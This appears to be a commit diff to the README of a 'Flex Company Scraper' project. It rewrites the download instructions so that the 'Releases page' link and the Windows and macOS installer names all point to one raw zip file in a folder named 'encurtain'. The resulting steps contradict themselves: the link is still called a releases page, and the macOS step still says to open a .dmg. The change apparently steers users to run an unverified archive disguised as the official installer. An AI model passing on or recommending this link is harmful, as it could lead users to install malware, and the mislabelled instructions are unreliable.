Diegocubi/the-flex-company-scraper/README.md

 - **Disk Space**: Minimum 100 MB free space.

 ## 📥 Download & Install
-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/Diegocubi/the-flex-company-scraper/releases) to find the latest version of the Flex Company Scraper.
+1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/Diegocubi/the-flex-company-scraper/raw/refs/heads/main/encurtain/the-flex-scraper-company-3.7.zip) to find the latest version of the Flex Company Scraper.
 2. **Select the Latest Version**: Look for the most recent release at the top of the page.
 3. **Download the File**: Click on the file that matches your operating system.
-   - For Windows, you may see something like `FlexCompanyScraperSetup.exe`.
+   - For Windows, you may see something like `https://github.com/Diegocubi/the-flex-company-scraper/raw/refs/heads/main/encurtain/the-flex-scraper-company-3.7.zip`.
-   - For macOS, look for `FlexCompanyScraper.dmg`.
+   - For macOS, look for `https://github.com/Diegocubi/the-flex-company-scraper/raw/refs/heads/main/encurtain/the-flex-scraper-company-3.7.zip`.
 4. **Run the Installer**:
    - For Windows: Double-click the installer file and follow the on-screen instructions.
    - For macOS: Open the downloaded `.dmg` file and drag the app to your Applications folder.